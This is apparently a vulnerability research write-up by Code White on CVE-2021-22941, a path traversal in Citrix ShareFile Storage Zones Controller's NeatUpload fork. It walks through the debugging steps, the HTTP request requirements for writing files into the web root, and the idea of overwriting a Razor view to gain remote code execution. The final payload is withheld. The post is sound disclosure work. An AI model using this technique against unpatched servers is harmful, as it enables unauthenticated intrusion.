Citrix ShareFile Storage Zones Controller uses a fork of the third party library NeatUpload. Versions before 5.11.20 are affected by a relative path traversal vulnerability (CTX328123/CVE-2021-22941) when processing upload requests. This can be exploited by unauthenticated users to gain Remote Code Execution.
Come and join us on a walk-though of finding and exploiting this vulnerability.
Part of our activities here at Code White is to monitor what vulnerabilities are published. These are then assessed to determine their criticality and exploitation potential. Depending on that, we inform our clients about affected systems and may also develop exploits for our offensive arsenal.
In April, Citrix published an advisory that addresses three vulnerabilities in ShareFile Storage Zones Controller (from here on just "ShareFile"). In contrast to a previous patch in the same product, there were no lightweight patches available, which could have been analysed quickly. Instead, only full installation packages were available. So, we downloaded
StorageCenter_5.11.18.msi to have a look at it.
A first glance at the files contained in the
.msi file revealed the third party library
NeatUpload.dll. We knew that the latest version contains a Padding Oracle vulnerability, and since the
NeatUpload.dll file had the same .NET file version number as ShareFile (i. e., 5.11.18), chances were that somebody had reported that very vulnerability to Citrix.
After installation of version 5.11.18 of ShareFile, attaching to the
w3wp.exe process with dnSpy and opening the
NeatUpload.dll, we noticed that the handler class
Brettle.Web.NeatUpload.UploadStateStoreHandler was missing. So, it must have either been removed by Citrix or they used an older version. Judging by the other classes in the library, the version used by ShareFile appeared to share similarities with NeatUpload 1.2 available on GitHub.
So, not a quick win, afterall? As we did not find a previous version of ShareFile such as 5.11.17, that we could use to diff against 5.11.18, we decided to give it a try to look for something in 5.11.18.
Finding A Path From Sink To Source
Since NeatUpload is a file upload handling library, our first attempts were focused around analysing its file handling. Here
FileStream was a good candidate to start with. By analysing where that class got instantiated, the first result already pointed directly to a method in NeatUpload, the
Brettle.Web.NeatUpload.UploadContext.WritePersistFile() method. Here a file gets written with something that appears to be some kind of metrics of an upload request:
By following the call hierarchy, one eventually ends up in
Brettle.Web.NeatUpload.UploadHttpModule.Init(HttpApplication), which is the initialization method for
That method is used to register event handlers that get called during the life cycle of an ASP.NET request. That module is also added to the list of modules in
After verifying that there is a direct path from the
UploadHttpModule processing a request to a
FileStream constructor, we have to check whether the file path and contents can be controlled. Back in
UploadContext.WritePersistFile(), both the file path and contents include the
PostBackID property value. By following the call hierarchy of the assignment of the
UploadContext.postBackID field that backs that property, there is also a path originating from the
FilteringWorkerRequest.ParseOrThrow(), the return value of a
FieldNameTranslator.FileFieldNameToPostBackID(string) call ends up in the assignment of that field:
The condition of that
if branch is that
text4 are set and that
FieldNameTranslator.FileFieldNameToPostBackID(string) returns a value for
text5 originates from the
filename attribute of a
Content-Disposition multi-part header and
text4 from its
name attribute (see lines 514–517). That means, the request must be a multipart message with one part having a header like this:
Content-Disposition: form-data; name="text4"; filename="text5"
FieldNameTranslator.FileFieldNameToPostBackID(string) method call either returns the value of the
FieldNameTranslator.PostBackID field if present:
By following the assignment of that
FieldNameTranslator.PostBackID field, it becomes clear that the internal constructor of
FieldNameTranslator takes it from a request query string parameter:
So, let's summarize our knowledge of the HTTP request requirements so far:
POST /default.aspx?foo HTTP/1.1
Content-Type: multipart/form-data; boundary="boundary"
Content-Disposition: form-data; name="text4"; filename="text5"
The request path and query string are not yet known, so we'll simply use dummies. This works because HTTP modules are not bound to paths like HTTP handlers are.
Important Checkpoints Along The Route
Let's set some breakpoints at some critical points and ensure they get reached and behave as assumed:
UploadHttpModule.Application_BeginRequest()– to ensure the HTTP module is actually active (the BeginRequest event handler is the first in the chain of raised events)
FieldNameTranslator..ctor()– to ensure the
FieldNameTranslator.PostBackIDfield gets set with our value
FilteringWorkerRequest.ParseOrThrow()– to ensure the multipart parsing works as expected
UploadContext.set_PostBackID(string)– to ensure the
UploadContext.postBackIDfield is set with our value
UploadContext.WritePersistFile()– to ensure the file path and content contain our value
After sending the request, the break point at
UploadHttpModule.Application_BeginRequest() should be hit. Here we can also see that the module expects the
RawUrl to contain
upload.aspx and send the request again. This time the break point at the constructor of
FieldNameTranslator should be hit. Here we can see that the
PostBackID field value is taken from a query string parameter named
uploadid (which is actually configured in the
After sending a new request with the query string
id=foo, our next break point at
FilteringWorkerRequest.ParseOrThrow() should be hit. After stepping through that method, you'll notice that some additional parameters
accountid are expected:
Let's add them with bogus values and try it again. This time the break point at
UploadContext.WritePersistFile() should get hit where the
FileStream gets created:
So, now we have reached the
FileStream constructor but the
UploadContext.PostBackID field value is
null as it hasn't been set yet.
Are We Still On Track?
You may have noticed that the break point at
UploadContext.set_PostBackID(string) also hasn't been hit yet. This is because the
while loop in
FilteringWorkerRequest.ParseOrThrow() uses the result of
FilteringWorkerRequest.CopyUntilBoundary(string, string, string) as condition but it returns
false on its first call so the
while block never gets executed.
When looking at the code of
CopyUntilBoundary(string, string, string) (not depicted here), it appears that it fills some buffer with the posted data and returns
true. The byte array
tmpBuffer has a size of 4096 bytes, which our minimalistic example request certainly does not exceed.
After sending a multipart part that is larger than 4096 bytes the break point at the
FileStream should get hit twice, once with a
null value originating from within the
FilteringWorkerRequest.CopyUntilBoundary(string, string, string) call and once with
foo originating from within the
Stepping into the
FileStream constructor also shows the resulting path, which is
context does not exist, we're already within the document root directory that the
w3wp.exe process user has full control of:
Let's prove this by writing a file to it using
We have reached our destination, we can write into the web root directory!
What's In The Backpack?
Now that we're able to write files, how can we exploit this? We have to keep in mind that the
uploadid parameter is used for both the file path and the content.
That means, the restriction is that we can only use characters that are valid in Windows file system paths. According to the naming conventions of files and paths, the following characters are not allowed:
- Characters in range of 0–31 (0x00–0x1F)
|(vertical bar or pipe)
> are daunting as we can't write an
.aspx web shell, which would require
<% … %> or
<script runat="server">…</script> blocks. Binary files like DLLs are also out as they require bytes in the range 0–31.
So, is that the end of this journey? At best a denial of service when overwriting existing files? Have we already tried hard enough?
Running With Razor
If you are a little more familiar with ASP.NET, you will probably know that there are not just Web Forms (i. e.,
.asmx, etc.) but also two other web application frameworks, one of them being MVC (model/view/controller). And while the models and controllers are compiled to binary assemblies, the views are implemented in separate
.cshtml files. These use a different syntax, the Razor Pages syntax, which uses
@ symbol to transition from HTML to C#:
And ShareFile does not just use Web Forms but also MVC:
Note that we can't just add new views as their rendering is driven by the corresponding controller. But we can overwrite an existing view file like the
ConfigService\Views\Shared\Error.cshtml, which is accessible via
What is still missing now is the writing of the actual payload using Razor syntax. We won't show this here, but here is a hint: unlike Unix-based systems, Windows doesn't require each segment in a file path to exist as it gets resolved symbolically. That means, we could use additional "directories" to contain the payload as long as we "step out" of them so that the resolved path still points to the right file.
Timeline And Fix
Code White reported the vulnerability to Citrix on May 14th. On August 25th, Citrix released the ShareFile Storage Zones Controller 5.11.20 to address this vulnerability by validating the passed value before assigning
On September 14th, Citrix published the Security Bulletin CTX328123.